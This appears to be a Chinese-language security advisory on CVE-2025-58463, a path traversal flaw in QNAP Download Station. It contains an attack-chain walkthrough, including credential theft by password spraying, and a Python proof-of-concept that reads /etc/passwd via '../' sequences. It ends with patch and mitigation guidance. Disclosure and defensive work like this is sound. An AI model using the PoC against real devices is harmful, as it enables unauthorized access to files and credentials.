CVE-2025-58463 QNAP Download Station 路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-58463

漏洞类型

路径遍历

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

QNAP Download Station

漏洞概述

CVE-2025-58463是威联通（QNAP）Download Station应用中的一个相对路径遍历（Relative Path Traversal）漏洞。该漏洞影响Download Station多个版本，CVSS评分为4.9，属于中等严重程度。漏洞的核心问题在于应用程序对用户输入的文件路径缺乏充分的验证和过滤，攻击者可以通过构造特殊的路径序列（如../）来绕过目录限制，访问应用程序预期范围之外的文件资源。根据CVSS 3.1向量，攻击复杂度低，无需用户交互，但需要高权限（管理员账户）才能成功利用。成功利用此漏洞可导致敏感信息泄露，攻击者能够读取系统配置文件、凭据文件或其他应用数据，可能造成严重的数据安全风险。QNAP官方已于2025年9月发布安全更新修复此漏洞，建议用户立即升级到安全版本。

技术细节

该路径遍历漏洞存在于Download Station的文件处理功能中。攻击者利用相对路径序列（如../或..\）绕过目录访问限制，读取服务器上的任意文件。漏洞利用前提条件：1）攻击者需要拥有一个有效的QNAP设备管理员账户；2）能够向Download Station的受影响端点发送HTTP请求。典型攻击流程：攻击者构造包含路径遍历序列的请求参数，例如将文件名参数设置为../../../../etc/passwd，系统在处理该请求时未正确验证路径安全，直接将参数值用于文件操作，导致攻击者可以读取目标系统的敏感文件。此类漏洞通常影响服务器端文件读取功能，攻击者可能获取/etc/passwd、配置文件、SSH密钥、日志文件等敏感数据。由于需要管理员权限，实际攻击场景可能是已获得初始访问权限的攻击者进行横向移动或进一步权限提升。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标QNAP设备，确认运行存在漏洞的Download Station版本

STEP 2

步骤2

获取管理员权限：攻击者通过社会工程、密码喷洒或其他方式获取QNAP设备的管理员账户凭据

STEP 3

步骤3

构造恶意请求：攻击者构造包含路径遍历序列（如../../../../etc/passwd）的HTTP请求

STEP 4

步骤4

发送漏洞利用请求：利用Download Station的文件处理功能缺陷发送恶意请求

STEP 5

步骤5

获取敏感数据：服务器未正确验证路径，导致攻击者读取目标文件内容（如系统配置文件、凭据等）

STEP 6

步骤6

横向移动或权限提升：利用获取的敏感信息进一步渗透网络或提升权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-58463 Path Traversal PoC for QNAP Download Station
# Target: QNAP Download Station < 5.10.0.304
# Authentication: Requires administrator account

def exploit_path_traversal(target_url, username, password, file_path):
    """
    Exploit path traversal vulnerability in QNAP Download Station.
    
    Args:
        target_url: Base URL of QNAP device (e.g., https://192.168.1.100)
        username: Administrator username
        password: Administrator password
        file_path: File path to read (e.g., ../../../../etc/passwd)
    
    Returns:
        File contents if exploitation successful, None otherwise
    """
    
    # Step 1: Authentication
    login_url = f"{target_url}/cgi-bin/authLogin.cgi"
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    try:
        auth_response = session.post(login_url, data=login_data, verify=False, timeout=10)
        
        # Step 2: Send path traversal request
        exploit_url = f"{target_url}/cgi-bin/downloadstation.cgi"
        exploit_params = {
            "action": "download",
            "filename": file_path,  # Path traversal payload
            "source": "external"
        }
        
        response = session.get(exploit_url, params=exploit_params, verify=False, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Successfully exploited CVE-2025-58463")
            print(f"[+] Retrieved file: {file_path}")
            return response.text
        else:
            print(f"[-] Exploitation failed with status code: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

# Example usage
if __name__ == "__main__":
    target = "https://192.168.1.100"
    user = "admin"
    pwd = "password"
    
    # Read /etc/passwd via path traversal
    payload = "../../../../etc/passwd"
    result = exploit_path_traversal(target, user, pwd, payload)
    
    if result:
        print("\n--- File Contents ---")
        print(result)

影响范围

Download Station < 5.10.0.304

Download Station 5.10.0.304 (2025/09/08) 之前版本

Download Station 5.10.0.305 (2025/09/16) 之前版本

防御指南

临时缓解措施

立即将QNAP Download Station升级到5.10.0.305（2025/09/16）或5.10.0.304（2025/09/08）及以上版本。如果暂时无法升级，应限制Download Station的管理界面访问，仅允许受信任的IP地址访问，并加强管理员账户的安全防护，启用双因素认证（如果设备支持）。同时监控设备日志，关注异常的路径遍历请求特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-58463
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-58463
3 Details https://www.cvedetails.com/cve/CVE-2025-58463/
4 VulDB https://vuldb.com/cve/CVE-2025-58463
5 Link https://www.qnap.com/en/security-advisory/qsa-25-37